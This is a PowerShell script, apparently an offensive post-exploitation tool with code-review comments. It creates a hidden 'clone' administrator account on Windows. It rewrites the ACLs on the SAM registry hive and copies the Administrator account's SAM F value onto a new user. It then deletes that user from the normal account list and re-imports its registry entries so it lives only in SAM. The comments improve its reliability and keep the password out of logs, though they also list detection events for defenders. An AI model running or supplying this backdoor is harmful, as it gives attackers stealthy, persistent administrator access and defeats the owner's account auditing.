function Create-Clone
{
<#
.SYNOPSIS
Creates a "clone" local account that carries the SAM F value of an existing
account (by default Administrator) and is then removed from the normal user
list, leaving it present only in the SAM hive. This script requires
Administrator privileges and temporarily grants Administrators full control of
HKLM\SAM\SAM so it can read and write the hive; if the registry operations
still fail under a plain administrator token, use Invoke-TokenManipulation.ps1
to obtain SYSTEM privileges first and then create the clone user.
.PARAMETER u
The clone username
.PARAMETER p
The clone user's password
.PARAMETER cu
The user to clone, default administrator
.EXAMPLE
Create-Clone -u evi1cg -p evi1cg123 -cu administrator
#>
Param(
[Parameter(Mandatory=$true)]
[String]
$u,
[Parameter(Mandatory=$true)]
[String]
$p,
[Parameter(Mandatory=$false)]
[String]
$cu = "administrator"
)
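function upReg{
    # Open the SAM hive for this script: regini replaces the ACL of each listed
    # key with the given ACEs (1 = Administrators full access, 17 = System full
    # access, per regini's own help text). By default only SYSTEM can read
    # below HKLM\SAM\SAM, so every later Test-Path / Get-Item on those keys
    # would fail without this. downreg is the matching restore and must run
    # afterwards even if a later step fails, otherwise every local
    # administrator keeps read/write access to the SAM hive.
    $keys = @(
        'HKEY_LOCAL_MACHINE\SAM',
        'HKEY_LOCAL_MACHINE\SAM\SAM',
        'HKEY_LOCAL_MACHINE\SAM\SAM\Domains',
        'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account',
        'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users',
        'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names'
    )
    $ini = Join-Path $env:temp 'up.ini'
    try {
        $keys | ForEach-Object { "$_ [1 17]" } | Out-File -FilePath $ini
        # Quote the path: %TEMP% may contain spaces.
        cmd /c "regini `"$ini`"" | Out-Null
    }
    finally {
        # Do not leave the ACL-change script behind, even if regini failed.
        if (Test-Path $ini) { Remove-Item $ini -Force }
    }
}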
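function downreg {
    # Put the SAM hive ACLs back after upReg: every key below HKLM\SAM\SAM
    # returns to SYSTEM-only (regini ACE 17), HKLM\SAM itself keeps
    # Administrators + SYSTEM (1 17).
    # NOTE(review): these are the values this script assumes, not a snapshot
    # of the host's pre-run ACLs; on a hardened or non-default host they may
    # differ from the originals. The per-account keys that GetUser-Key and
    # Clone also open (Names\<user>, Users\<RID>) are not listed here - whether
    # they revert depends on inheritance from Names/Users, so check with
    # Get-Acl after a run.
    $lines = @(
        'HKEY_LOCAL_MACHINE\SAM [1 17]',
        'HKEY_LOCAL_MACHINE\SAM\SAM [17]',
        'HKEY_LOCAL_MACHINE\SAM\SAM\Domains [17]',
        'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account [17]',
        'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users [17]',
        'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names [17]'
    )
    $ini = Join-Path $env:temp 'down.ini'
    try {
        $lines | Out-File -FilePath $ini
        cmd /c "regini `"$ini`"" | Out-Null
    }
    finally {
        if (Test-Path $ini) { Remove-Item $ini -Force }
    }
}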
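function Create-user ([string]$Username,[string]$Password) {
    # Make sure local account $Username exists with password $Password, is a
    # member of the local Administrators group and has a non-expiring password.
    # Existence is checked in the SAM hive itself (needs the ACL change made by
    # upReg) rather than via `net user`, so an account that was already hidden
    # from the enumeration APIs is still found.
    # NOTE(review): "Administrators" is the English group name; localized
    # builds use a different name (the well-known SID S-1-5-32-544 is portable).
    $group = "Administrators"
    $existing = Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$Username"
    if (-not $existing) {
        # Do not echo the password: console output, transcripts and C2 logs
        # would retain it in clear text.
        Write-Host "[*] Creating new local user $Username"
        # NOTE(review): the password is still passed on the command line, so it
        # shows up in process-creation auditing (4688 with command line, Sysmon
        # event 1). /y suppresses the >14-character confirmation prompt.
        & NET USER $Username $Password /add /y /expires:never | Out-Null
        Write-Host "[*] Adding local user $Username to $group."
        & NET LOCALGROUP $group $Username /add | Out-Null
    }
    else {
        Write-Host "[*] Adding existing user $Username to $group."
        & NET LOCALGROUP $group $Username /add | Out-Null
        $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
        $account = $adsi.Children |
            Where-Object { $_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
        if ($null -eq $account) {
            # The SAM key exists but the WinNT provider does not list the
            # account (for example an already-hidden clone); calling
            # SetPassword on $null would only produce a confusing error.
            Write-Warning "[-] $Username not visible via WinNT://; password NOT changed"
            return
        }
        Write-Host "[*] Setting password for existing local user $Username"
        $account.SetPassword($Password)
    }
    Write-Host "[*] Ensuring password for $Username never expires."
    # NOTE(review): WMIC is deprecated and missing on recent Windows builds;
    # Set-LocalUser -PasswordNeverExpires $true is the supported replacement.
    & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE | Out-Null
}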
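function GetUser-Key([string]$user)
{
    # Resolve the SAM RID key name (8 hex digits, e.g. 000003E9) of local
    # account $user. The default value of Names\<user> carries the RID in its
    # registry type field, which regedit exports as `@=hex(3e9):`; that number,
    # zero-padded to 8 digits, is the name of the Users\<RID> key holding the
    # account's F and V blobs.
    # Returns the key name, or nothing (after a message) when the Names key
    # is missing or the export could not be parsed - callers must check.
    # Side effects: grants Administrators full control on Names\<user> via
    # regini [1 17] (not reverted here); writes <temp>\<user>.ini (removed) and
    # <temp>\<user>.reg, which is deliberately LEFT on disk because Main
    # re-imports it after the visible account is deleted.
    $namesKey = "HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\$user"
    $ini = Join-Path $env:temp "$user.ini"
    $reg = Join-Path $env:temp "$user.reg"
    try {
        # Out-File instead of `cmd echo >>` so a stale .ini from an earlier
        # run is overwritten rather than appended to.
        "$namesKey [1 17]" | Out-File -FilePath $ini
        # regini output is discarded so it cannot leak into the return value.
        cmd /c "regini `"$ini`"" | Out-Null
    }
    finally {
        if (Test-Path $ini) { Remove-Item $ini -Force }
    }
    if (-not (Test-Path -Path "HKLM:\SAM\SAM\Domains\Account\Users\Names\$user")) {
        Write-Host "[-] SomeThing Wrong !"
        return
    }
    # Quotes are escaped with backticks; the original's nested "" were only
    # silently dropped by argument parsing and would break on paths with spaces.
    cmd /c "regedit /e `"$reg`" `"$namesKey`""
    $content = Get-Content -Path $reg | Out-String
    if ($content -match '@=hex\((.*?)\):') {
        # PadLeft instead of a hard-coded "00000" prefix: RIDs >= 0x1000 export
        # as four or more hex digits and would otherwise yield a 9-char name.
        $key = $matches[1].PadLeft(8, '0')
        Write-Host "[!]"$key
        return $key
    }
    Write-Host "[-] SomeThing Wrong !"
}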
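function Clone ([string]$ukey,[string]$cukey) {
    # Copy the SAM "F" value of the account being cloned (Users\$cukey) over
    # the clone account's F (Users\$ukey), then export the modified Users\$ukey
    # key to <temp>\out.reg so Main can re-import it after the visible account
    # is deleted. $ukey / $cukey are the 8-hex-digit RID key names returned by
    # GetUser-Key.
    # Side effects: grants Administrators full control on both Users\<RID>
    # keys (not reverted here); writes <temp>\f.ini (removed) and
    # <temp>\out.reg (kept for Main).
    # Callers in this file pass the keys through Out-String, which appends a
    # newline - strip it before building any path.
    $ukey = $ukey.Trim()
    $cukey = $cukey.Trim()
    $base = 'HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users'
    $ini = Join-Path $env:temp 'f.ini'
    try {
        # Both keys go into ONE regini script. The original wrote the second
        # line without -Append, overwriting the first, so the clone's own key
        # never received the ACL and the Set-ItemProperty below could fail
        # under a plain Administrator token.
        @("$base\$ukey [1 17]", "$base\$cukey [1 17]") | Out-File -FilePath $ini
        cmd /c "regini `"$ini`"" | Out-Null
    }
    finally {
        if (Test-Path $ini) { Remove-Item $ini -Force }
    }
    $ureg = "HKLM:\SAM\SAM\Domains\Account\Users\$ukey"
    $cureg = "HKLM:\SAM\SAM\Domains\Account\Users\$cukey"
    Write-Host "[*] Get clone user'F value"
    $cuFvalue = (Get-Item -Path $cureg).GetValue('F')
    if ($null -eq $cuFvalue) {
        # Writing an empty F would corrupt the clone account rather than clone it.
        throw "[-] No F value found under $cureg"
    }
    Write-Host "[*] Change user'F value"
    Set-ItemProperty -Path $ureg -Name "F" -Value $cuFvalue
    $out = Join-Path $env:temp 'out.reg'
    # The original used "$outreg.Trim()" inside a double-quoted string, which
    # does not call Trim() - it expands $outreg and appends the literal
    # text ".Trim()" to the regedit command line.
    cmd /c "regedit /e `"$out`" `"$base\$ukey`""
}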
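function Main () {
    # Orchestrates the clone. Reads $u, $p and $cu from the enclosing
    # Create-Clone parameter scope. Steps: open the SAM ACLs (upReg) -> ensure
    # $u exists and is a local admin -> resolve both RID keys -> copy $cu's F
    # over $u's (Clone) -> delete $u with `net user` if this run created it ->
    # re-import the saved Names\$u and Users\<RID> exports so the account
    # exists only in SAM -> restore the ACLs (downreg).
    # downreg runs in `finally`: the original had no cleanup path, so any
    # failure after upReg left HKLM\SAM\SAM readable and writable by every
    # local administrator.
    # Detection surface for defenders: regini/regedit child processes,
    # 4720/4732/4726 account events and writes under HKLM\SAM\SAM\Domains\Account.
    $identity = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = [Security.Principal.WindowsPrincipal] $identity
    if (-not $principal.IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")) {
        Write-Output "Script must be run as administrator"
        # `return`, not `break`: a bare `break` outside a loop unwinds past this
        # function and can terminate the calling script.
        return
    }
    $namesRoot = 'HKLM:\SAM\SAM\Domains\Account\Users\Names'
    $ownReg = Join-Path $env:temp "$u.reg"
    $cloneReg = Join-Path $env:temp "$cu.reg"
    $outReg = Join-Path $env:temp 'out.reg'
    Write-Output "[*] Start"
    Write-Output "[*] Tring to change reg privilege !"
    upReg
    try {
        if (-not (Test-Path -Path "$namesRoot\$cu")) {
            Write-Host "[-] The User to Clone does not exist !"
            Write-Output "[*] Exiting !"
            return
        }
        # Remember whether this run creates the account, so only an account
        # we made is deleted afterwards.
        $created = -not (Test-Path -Path "$namesRoot\$u")
        Write-Output "[*] Create User..."
        Create-user $u $p
        Write-Output "[*] Get User $u's Key .."
        $ukey = "$(GetUser-Key $u)".Trim()
        Write-Output "[*] Get User $cu's Key .."
        $cukey = "$(GetUser-Key $cu)".Trim()
        if (-not $ukey -or -not $cukey) {
            # GetUser-Key already printed why; never run Clone with an empty
            # key, which would target the Users root instead of a RID key.
            Write-Host "[-] Could not resolve RID keys, aborting before touching F values"
            Write-Output "[*] Exiting !"
            return
        }
        Write-Output "[*] Clone User.."
        Clone $ukey $cukey
        if ($created) {
            Write-Output "[*] Delete User.."
            cmd /c "net User $u /del " | Out-Null
        }
        else {
            Write-Output "[*] Don't need to delete.."
        }
        # Re-create the SAM entries captured before the delete; from here on
        # the account is in the hive but no longer listed by `net user`.
        cmd /c "regedit /s `"$ownReg`""
        cmd /c "regedit /s `"$outReg`""
        # Remove only this script's own exports; the original
        # `Remove-Item $env:temp\*.reg` deleted every .reg file in %TEMP%.
        foreach ($f in @($ownReg, $cloneReg, $outReg)) {
            if (Test-Path $f) { Remove-Item $f -Force }
        }
        Write-Output "[*] Done"
    }
    finally {
        Write-Output "[*] Change reg privilege back !"
        downreg
    }
}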
Main
}